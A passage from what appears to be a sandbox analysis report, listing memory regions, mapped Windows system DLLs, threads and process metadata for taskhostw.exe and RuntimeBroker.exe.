end_va = 0x7df5fffe2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5fffc0000"
filename = ""
Region:
id = 2535
start_va = 0x7df5ffff0000
end_va = 0x7ff5fffeffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffff0000"
filename = ""
Region:
id = 2536
start_va = 0x7ff67cd20000
end_va = 0x7ff67cd38fff
monitored = 0
entry_point = 0x7ff67cd259b0
region_type = mapped_file
name = "taskhostw.exe"
filename = "\\Windows\\System32\\taskhostw.exe" (normalized: "c:\\windows\\system32\\taskhostw.exe")
Region:
id = 2537
start_va = 0x7ff8619c0000
end_va = 0x7ff861b80fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2538
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2539
start_va = 0x100000
end_va = 0x1bdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2540
start_va = 0x410000
end_va = 0x50ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000410000"
filename = ""
Region:
id = 2541
start_va = 0x7df5ffec0000
end_va = 0x7df5fffbffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffec0000"
filename = ""
Region:
id = 2542
start_va = 0x7ff85e0e0000
end_va = 0x7ff85e2c7fff
monitored = 0
entry_point = 0x7ff85e10ba70
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2543
start_va = 0x7ff85f160000
end_va = 0x7ff85f20cfff
monitored = 0
entry_point = 0x7ff85f1781a0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2544
start_va = 0x7ff85fca0000
end_va = 0x7ff85fd3cfff
monitored = 0
entry_point = 0x7ff85fca78a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2545
start_va = 0x510000
end_va = 0x58ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000510000"
filename = ""
Region:
id = 2546
start_va = 0x7ff8616d0000
end_va = 0x7ff8617ebfff
monitored = 0
entry_point = 0x7ff8617102b0
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2547
start_va = 0x7ff85ee20000
end_va = 0x7ff85f09cfff
monitored = 0
entry_point = 0x7ff85eef4970
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 2548
start_va = 0x7ff85e070000
end_va = 0x7ff85e0d9fff
monitored = 0
entry_point = 0x7ff85e0a6d50
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 2549
start_va = 0x7ff85f3e0000
end_va = 0x7ff85f4a0fff
monitored = 0
entry_point = 0x7ff85f400da0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2550
start_va = 0x590000
end_va = 0x6effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000590000"
filename = ""
Region:
id = 2551
start_va = 0x20000
end_va = 0x26fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 2556
start_va = 0x590000
end_va = 0x6d2fff
monitored = 0
entry_point = 0x5b8210
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2557
start_va = 0x6e0000
end_va = 0x6effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000006e0000"
filename = ""
Region:
id = 2558
start_va = 0x590000
end_va = 0x66cfff
monitored = 0
entry_point = 0x5ee0b0
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2559
start_va = 0x7ff85e060000
end_va = 0x7ff85e06efff
monitored = 0
entry_point = 0x7ff85e063210
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 2560
start_va = 0x1c0000
end_va = 0x1c6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 2561
start_va = 0x7ff85f5c0000
end_va = 0x7ff85f61afff
monitored = 0
entry_point = 0x7ff85f5d38b0
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 2563
start_va = 0x590000
end_va = 0x60ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000590000"
filename = ""
Region:
id = 2564
start_va = 0x7ff85f7f0000
end_va = 0x7ff85f945fff
monitored = 0
entry_point = 0x7ff85f7fa8d0
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2565
start_va = 0x7ff85f210000
end_va = 0x7ff85f395fff
monitored = 0
entry_point = 0x7ff85f25ffc0
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2566
start_va = 0x610000
end_va = 0x648fff
monitored = 0
entry_point = 0x6112f0
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2567
start_va = 0x6f0000
end_va = 0x877fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006f0000"
filename = ""
Region:
id = 2568
start_va = 0x7ff85f3a0000
end_va = 0x7ff85f3dafff
monitored = 0
entry_point = 0x7ff85f3a12f0
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2569
start_va = 0x880000
end_va = 0xa00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000880000"
filename = ""
Region:
id = 2570
start_va = 0xa10000
end_va = 0x1e0ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a10000"
filename = ""
Region:
id = 2571
start_va = 0x1d0000
end_va = 0x1d1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001d0000"
filename = ""
Region:
id = 2572
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Region:
id = 2573
start_va = 0x1f0000
end_va = 0x1f0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "taskhostw.exe.mui"
filename = "\\Windows\\System32\\en-US\\taskhostw.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskhostw.exe.mui")
Region:
id = 2574
start_va = 0x400000
end_va = 0x400fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 2575
start_va = 0x610000
end_va = 0x610fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000610000"
filename = ""
Region:
id = 2576
start_va = 0x7ff85c960000
end_va = 0x7ff85c9f5fff
monitored = 0
entry_point = 0x7ff85c985570
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 2577
start_va = 0x1e10000
end_va = 0x1f7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e10000"
filename = ""
Region:
id = 2579
start_va = 0x7ff85f680000
end_va = 0x7ff85f7d9fff
monitored = 0
entry_point = 0x7ff85f6c38e0
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 2580
start_va = 0x620000
end_va = 0x620fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000620000"
filename = ""
Region:
id = 2581
start_va = 0x620000
end_va = 0x6dbfff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000620000"
filename = ""
Region:
id = 2582
start_va = 0x1e10000
end_va = 0x1e13fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001e10000"
filename = ""
Region:
id = 2583
start_va = 0x1f70000
end_va = 0x1f7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f70000"
filename = ""
Region:
id = 2584
start_va = 0x7ff85bf70000
end_va = 0x7ff85bf91fff
monitored = 0
entry_point = 0x7ff85bf71a40
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 2585
start_va = 0x1e20000
end_va = 0x1e9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e20000"
filename = ""
Region:
id = 2586
start_va = 0x1ea0000
end_va = 0x1ea0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001ea0000"
filename = ""
Region:
id = 2587
start_va = 0x7ff85f0a0000
end_va = 0x7ff85f146fff
monitored = 0
entry_point = 0x7ff85f0ab4d0
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 2588
start_va = 0x1eb0000
end_va = 0x1eb0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001eb0000"
filename = ""
Region:
id = 2589
start_va = 0x7ff855e80000
end_va = 0x7ff855f78fff
monitored = 0
entry_point = 0x7ff855ec8000
region_type = mapped_file
name = "settingsynccore.dll"
filename = "\\Windows\\System32\\SettingSyncCore.dll" (normalized: "c:\\windows\\system32\\settingsynccore.dll")
Region:
id = 2592
start_va = 0x1ec0000
end_va = 0x1ec1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001ec0000"
filename = ""
Region:
id = 2593
start_va = 0x7ff85e410000
end_va = 0x7ff85e4c4fff
monitored = 0
entry_point = 0x7ff85e4522e0
region_type = mapped_file
name = "shcore.dll"
filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")
Region:
id = 2594
start_va = 0x7ff85e040000
end_va = 0x7ff85e053fff
monitored = 0
entry_point = 0x7ff85e0452e0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 2595
start_va = 0x7ff85f510000
end_va = 0x7ff85f5b6fff
monitored = 0
entry_point = 0x7ff85f5258d0
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 2596
start_va = 0x7ff85de70000
end_va = 0x7ff85de98fff
monitored = 0
entry_point = 0x7ff85de84530
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 2597
start_va = 0x7ff85d9c0000
end_va = 0x7ff85d9d6fff
monitored = 0
entry_point = 0x7ff85d9c79d0
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 2599
start_va = 0x7ff855c40000
end_va = 0x7ff855d0dfff
monitored = 0
entry_point = 0x7ff855c714c0
region_type = mapped_file
name = "tokenbroker.dll"
filename = "\\Windows\\System32\\TokenBroker.dll" (normalized: "c:\\windows\\system32\\tokenbroker.dll")
Region:
id = 2615
start_va = 0x7ff859cb0000
end_va = 0x7ff859de5fff
monitored = 0
entry_point = 0x7ff859cdf350
region_type = mapped_file
name = "wintypes.dll"
filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll")
Region:
id = 2616
start_va = 0x1f80000
end_va = 0x205cfff
monitored = 0
entry_point = 0x1fde0b0
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2618
start_va = 0x1ed0000
end_va = 0x1f4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001ed0000"
filename = ""
Region:
id = 2619
start_va = 0x1f80000
end_va = 0x1ffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f80000"
filename = ""
Region:
id = 2620
start_va = 0x2000000
end_va = 0x207ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002000000"
filename = ""
Region:
id = 2692
start_va = 0x7ff85b6b0000
end_va = 0x7ff85bb42fff
monitored = 0
entry_point = 0x7ff85b6bf760
region_type = mapped_file
name = "actxprxy.dll"
filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll")
Region:
id = 2693
start_va = 0x2080000
end_va = 0x20adfff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002080000"
filename = ""
Region:
id = 2700
start_va = 0x7ff857c70000
end_va = 0x7ff857cb0fff
monitored = 0
entry_point = 0x7ff857c74840
region_type = mapped_file
name = "usermgrproxy.dll"
filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll")
Thread:
id = 206
os_tid = 0x5f8
Thread:
id = 208
os_tid = 0x604
Thread:
id = 210
os_tid = 0x60c
Thread:
id = 211
os_tid = 0x610
Thread:
id = 214
os_tid = 0x61c
Thread:
id = 215
os_tid = 0x628
Thread:
id = 216
os_tid = 0x62c
Process:
id = "12"
image_name = "runtimebroker.exe"
filename = "c:\\windows\\system32\\runtimebroker.exe"
page_root = "0x2fd46000"
os_pid = "0x640"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "rpc_server"
parent_id = "11"
os_parent_pid = "0x274"
cmd_line = "C:\\Windows\\System32\\RuntimeBroker.exe -Embedding"
cur_dir = "C:\\Windows\\system32\\"
os_username = "XC64ZB\\RDhJ0CNFevzX"
bitness = "32"
os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f2cf" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 2642
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2643
start_va = 0x20000
end_va = 0x20fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 2644
start_va = 0x30000
end_va = 0x44fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2645
start_va = 0x50000
end_va = 0xcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 2646
start_va = 0xd0000
end_va = 0xd3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 2647
start_va = 0xe0000
end_va = 0xe1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 2648
start_va = 0xf0000
end_va = 0xf1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 2649
start_va = 0x100000
end_va = 0x1bdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2650
start_va = 0x1c0000
end_va = 0x1c0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 2651
start_va = 0x1d0000
end_va = 0x1d0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001d0000"
filename = ""
Region:
id = 2652
start_va = 0x1f0000
end_va = 0x1f6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001f0000"
filename = ""
Region:
id = 2653
start_va = 0x200000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 2654
start_va = 0x400000
end_va = 0x4fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 2655
start_va = 0x500000
end_va = 0x57ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000500000"
filename = ""
Region:
id = 2656
start_va = 0x580000
end_va = 0x5fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000580000"
filename = ""
Region:
id = 2657
start_va = 0x600000
end_va = 0x606fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000600000"
filename = ""
Region:
id = 2658
start_va = 0x610000
end_va = 0x68ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000610000"
filename = ""
Region:
id = 2659
start_va = 0x700000
end_va = 0x7fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000700000"
filename = ""
Region:
id = 2660
start_va = 0x800000
end_va = 0x987fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000800000"
filename = ""
Region:
id = 2661
start_va = 0x990000
end_va = 0xb10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000990000"
filename = ""
Region:
id = 2662
start_va = 0xb20000
end_va = 0x1f1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000b20000"
filename = ""
Region:
id = 2663
start_va = 0x1f20000
end_va = 0x1f9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f20000"
filename = ""
Region:
id = 2664
start_va = 0x1fa0000
end_va = 0x201ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001fa0000"
filename = ""
Region:
id = 2665
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2666
start_va = 0x7df5ffec0000
end_va = 0x7df5fffbffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffec0000"
filename = ""
Region:
id = 2667
start_va = 0x7df5fffc0000
end_va = 0x7df5fffe2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5fffc0000"
filename = ""
Region:
id = 2668
start_va = 0x7df5ffff0000
end_va = 0x7ff5fffeffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffff0000"
filename = ""
Region:
id = 2669
start_va = 0x7ff623770000
end_va = 0x7ff623786fff
monitored = 0
entry_point = 0x7ff6237744f0
region_type = mapped_file
name = "runtimebroker.exe"
filename = "\\Windows\\System32\\RuntimeBroker.exe" (normalized: "c:\\windows\\system32\\runtimebroker.exe")
Region:
id = 2670
start_va = 0x7ff85dfe0000
end_va = 0x7ff85e02afff
monitored = 0
entry_point = 0x7ff85dfe35f0
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 2671
start_va = 0x7ff85e060000
end_va = 0x7ff85e06efff
monitored = 0
entry_point = 0x7ff85e063210
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 2672
start_va = 0x7ff85e070000
end_va = 0x7ff85e0d9fff
monitored = 0
entry_point = 0x7ff85e0a6d50
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 2673
start_va = 0x7ff85e0e0000
end_va = 0x7ff85e2c7fff
monitored = 0
entry_point = 0x7ff85e10ba70
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2674
start_va = 0x7ff85ee20000
end_va = 0x7ff85f09cfff
monitored = 0
entry_point = 0x7ff85eef4970
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 2675
start_va = 0x7ff85f0a0000
end_va = 0x7ff85f146fff
monitored = 0
entry_point = 0x7ff85f0ab4d0
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 2676
start_va = 0x7ff85f160000
end_va = 0x7ff85f20cfff
monitored = 0
entry_point = 0x7ff85f1781a0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2677
start_va = 0x7ff85f210000
end_va = 0x7ff85f395fff
monitored = 0
entry_point = 0x7ff85f25ffc0
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2678
start_va = 0x7ff85f3a0000
end_va = 0x7ff85f3dafff
monitored = 0
entry_point = 0x7ff85f3a12f0
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2679
start_va = 0x7ff85f5c0000
end_va = 0x7ff85f61afff
monitored = 0
entry_point = 0x7ff85f5d38b0
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 2680
start_va = 0x7ff85f7f0000
end_va = 0x7ff85f945fff
monitored = 0
entry_point = 0x7ff85f7fa8d0
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2681
start_va = 0x7ff85fb50000
end_va = 0x7ff85fc92fff
monitored = 0
entry_point = 0x7ff85fb78210
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2682
start_va = 0x7ff85fca0000
end_va = 0x7ff85fd3cfff
monitored = 0
entry_point = 0x7ff85fca78a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2683
start_va = 0x7ff8616d0000
end_va = 0x7ff8617ebfff
monitored = 0
entry_point = 0x7ff8617102b0
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2684
start_va = 0x7ff8619c0000
end_va = 0x7ff861b80fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2685
start_va = 0x7ff855c40000
end_va = 0x7ff855d0dfff
monitored = 0
entry_point = 0x7ff855c714c0
region_type = mapped_file
name = "tokenbroker.dll"
filename = "\\Windows\\System32\\TokenBroker.dll" (normalized: "c:\\windows\\system32\\tokenbroker.dll")
Region:
id = 2686
start_va = 0x7ff85f3e0000
end_va = 0x7ff85f4a0fff
monitored = 0
entry_point = 0x7ff85f400da0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2687
start_va = 0x7ff85e410000
end_va = 0x7ff85e4c4fff
monitored = 0
entry_point = 0x7ff85e4522e0
region_type = mapped_file
name = "shcore.dll"
filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")
Region:
id = 2688
start_va = 0x7ff85de70000
end_va = 0x7ff85de98fff
monitored = 0
entry_point = 0x7ff85de84530
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 2689
start_va = 0x7ff859cb0000
end_va = 0x7ff859de5fff
monitored = 0
entry_point = 0x7ff859cdf350
region_type = mapped_file
name = "wintypes.dll"
filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll")
Region:
id = 2691
start_va = 0x7ff85b6b0000
end_va = 0x7ff85bb42fff
monitored = 0
entry_point = 0x7ff85b6bf760
region_type = mapped_file
name = "actxprxy.dll"
filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll")
Region:
id = 2694
start_va = 0x7ff85c6f0000
end_va = 0x7ff85c702fff
monitored = 0
entry_point = 0x7ff85c6f2760
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 2695
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Region:
id = 2696
start_va = 0x7ff8570c0000
end_va = 0x7ff8570e7fff
monitored = 0
entry_point = 0x7ff8570c8c10
region_type = mapped_file
name = "idstore.dll"
filename = "\\Windows\\System32\\IDStore.dll" (normalized: "c:\\windows\\system32\\idstore.dll")
Region:
id = 2697
start_va = 0x7ff85f510000
end_va = 0x7ff85f5b6fff
monitored = 0
entry_point = 0x7ff85f5258d0
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 2698
start_va = 0x7ff85c690000
end_va = 0x7ff85c6abfff
monitored = 0
entry_point = 0x7ff85c6937a0
region_type = mapped_file
name = "samlib.dll"
filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll")
Region:
id = 2699
start_va = 0x690000
end_va = 0x6bdfff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000690000"
filename = ""
Thread:
id = 221
os_tid = 0x678
Thread:
id = 222
os_tid = 0x674
Thread:
id = 223
os_tid = 0x670
Thread:
id = 224
os_tid = 0x650
Thread:
id = 225
os_tid = 0x64c
Thread:
id = 226
os_tid = 0x644